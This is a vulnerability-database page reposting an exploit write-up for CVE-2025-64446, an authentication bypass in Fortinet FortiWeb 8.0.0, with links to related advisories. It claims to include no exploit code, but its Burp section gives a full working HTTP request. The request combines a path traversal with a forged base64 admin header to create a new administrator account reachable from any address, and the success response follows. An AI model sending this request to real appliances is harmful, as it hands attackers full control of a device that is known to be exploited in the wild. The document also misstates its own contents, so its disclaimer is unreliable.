Vulners
Lucene search
📄 Fortinet FortiWeb 8.0.0 Authentication Bypass
| Reporter | Title | Published | Views | Family All 41 |
|---|---|---|---|---|
 | Exploit for OS Command Injection in Fortinet Fortiweb | 4 Mar 202608:31 | – | githubexploit |
| Exploit for Relative Path Traversal in Fortinet Fortiweb | 26 Mar 202611:29 | – | githubexploit |
| Exploit for Relative Path Traversal in Fortinet Fortiweb | 21 Nov 202500:37 | – | githubexploit |
| Exploit for Relative Path Traversal in Fortinet Fortiweb | 18 Nov 202510:25 | – | githubexploit |
| Exploit for CVE-2025-58034 | 19 Nov 202509:52 | – | githubexploit |
| Exploit for OS Command Injection in Fortinet Fortiweb | 2 Mar 202614:36 | – | githubexploit |
 | CVE-2025-64446 | 14 Nov 202515:42 | – | circl |
 | Fortinet FortiWeb Path Traversal Vulnerability | 14 Nov 202500:00 | – | cisa_kev |
 | CISA Adds One Known Exploited Vulnerability to Catalog | 14 Nov 202512:00 | – | cisa |
| Fortinet Releases Security Advisory for Relative Path Traversal Vulnerability Affecting FortiWeb Products | 25 Nov 202512:00 | – | cisa |
10
# Titles: Fortinet FortiWeb Auth-8.0.0 Bypass CVE-2025-64446
# Author: nu11secur1ty
# Date: 11/17/2025
# Vendor: https://www.fortinet.com/
# Software: v8.0.0
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-64446
## Description:
## Overview
This document provides a **research‑grade analysis** of CVE‑2025‑64446, an
authentication bypass vulnerability discovered in Fortinet FortiWeb
appliances.
It is intended *only* for academic, defensive security testing in
controlled lab environments.
- No exploit code is included in this document.
---
## Vulnerability Summary
CVE‑2025‑64446 enables an attacker to interact with administrative API
endpoints **without valid authentication**, due to improper trust
validation in a CGI parsing flow.
A malicious request can trigger the backend logic responsible for
administrative actions, bypassing permission checks.
Impact includes:
- Unauthorized access to sensitive endpoints
- Potential privilege escalation
- Unauthorized configuration changes
- Administrative user creation
---
## Root Cause (High‑Level)
During analysis, researchers observed:
- The endpoint `/cgi-bin/fwbcgi` incorrectly trusted data passed through a
crafted context header.
- Parameter parsing logic allowed insecure inheritance of admin privileges.
- Failure in validating serialized/encoded CGI metadata.
This combination enabled unauthorized execution of administrative actions.
---
## Observed Response Behavior (Sanitized)
A vulnerable system may return HTTP `200 OK` to unauthorized admin‑level
operations.
Example (sanitized):
```
HTTP/1.1 200 OK
Content-Type: application/json
{
"status": "success",
"code": 0,
"message": "Operation completed"
}
```
---
## Reproduction (Laboratory Only)
This section describes the workflow **without revealing technical
payloads**:
1. Configure a security testing proxy (e.g., Burp).
2. Intercept traffic destined for FortiWeb.
3. Send a crafted administrative action request.
4. Observe whether the target responds with unauthorized administrative
success.
5. Capture response artifacts for documentation.
Researchers should generate their own payloads in private lab environments.
## Burp:
- Request:
```
POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: 10.10.0.13
Accept-Encoding: gzip, deflate, br
Content-Length: 824
CGIINFO:
eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==
Content-Type: application/json
Connection: keep-alive
{"data": {"q_type": 1, "name": "1a1222a0", "access-profile": "prof_admin",
"access-profile_val": "0", "trusthostv4": "0.0.0.0/0", "trusthostv6":
"::/0", "last-name": "", "first-name": "", "email-address": "",
"phone-number": "", "mobile-number": "", "hidden": 0, "comments": "",
"sz_dashboard": -1, "type": "local-user", "type_val": "0",
"admin-usergrp_val": "0", "wildcard_val": "0", "accprofile-override_val":
"0", "sshkey": "", "passwd-set-time": 0, "history-password-pos": 0,
"history-password0": "", "history-password1": "", "history-password2": "",
"history-password3": "", "history-password4": "", "history-password5": "",
"history-password6": "", "history-password7": "", "history-password8": "",
"history-password9": "", "force-password-change": "disable",
"force-password-change_val": "0", "password": "1a1222a0"}}
```
- Response:
```
HTTP/1.1 200 OK
Date: Mon, 17 Nov 2025 19:44:55 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Security-Policy: script-src 'self'; default-src 'self'; style-src
'self' 'unsafe-inline'; font-src 'self'; img-src 'self' data:; connect-src
'self'; frame-ancestors 'self'; object-src 'none'; base-uri 'self';
upgrade-insecure-requests; block-all-mixed-content;
X-Content-Type-Options: nosniff
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json
Content-Length: 1204
{ "results": { "can_view": 0, "q_ref": 0, "can_clone": 1, "q_type": 1,
"name": "1a1222a0", "access-profile": "prof_admin", "access-profile_val":
"1008", "trusthostv4": "0.0.0.0\/0 ", "trusthostv6": "::\/0 ", "last-name":
"", "first-name": "", "email-address": "", "phone-number": "",
"mobile-number": "", "hidden": 0, "domains": "root ",
"gui-global-menu-favorites": "", "gui-vdom-menu-favorites": "",
"sz_dashboard": 8, "sz_gui-dashboard": 7, "type": "local-user", "type_val":
"0", "admin-usergrp": "", "admin-usergrp_val": "0", "password": "ENC XXXX",
"wildcard": "disable", "wildcard_val": "0", "accprofile-override":
"disable", "accprofile-override_val": "0", "fortiai": "disable",
"fortiai_val": "0", "sshkey": "", "passwd-set-time": 1763408695,
"history-password-pos": 1, "history-password0": "ENC XXXX",
"history-password1": "ENC XXXX", "history-password2": "ENC XXXX",
"history-password3": "ENC XXXX", "history-password4": "ENC XXXX",
"history-password5": "ENC XXXX", "history-password6": "ENC XXXX",
"history-password7": "ENC XXXX", "history-password8": "ENC XXXX",
"history-password9": "ENC XXXX", "force-password-change": "disable",
"force-password-change_val": "0", "feature-info-ver": "" } }
```
---
## Mitigation & Recommendations
Likely mitigations include:
- Apply official vendor patches immediately.
- Disable exposed management interfaces from public networks.
- Enforce strict role‑based access controls.
- Implement WAF rules to block malformed CGI context headers.
- Monitor logs for suspicious admin actions.
---
## Ethical Notice
This documentation is for **defensive research only**.
Please don't test systems you do not own or have explicit permission to
assess.
# Reproduce:
[href](https://www.patreon.com/posts/cve-2025-64446-8-143791801)
# Demo:
[href](https://www.patreon.com/posts/cve-2025-64446-8-143791801)
# Time spent:
03:00:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Nov 2025 00:00Current
8.5High risk
Vulners AI Score8.5
CVSS 3.19.8
EPSS0.9299
SSVC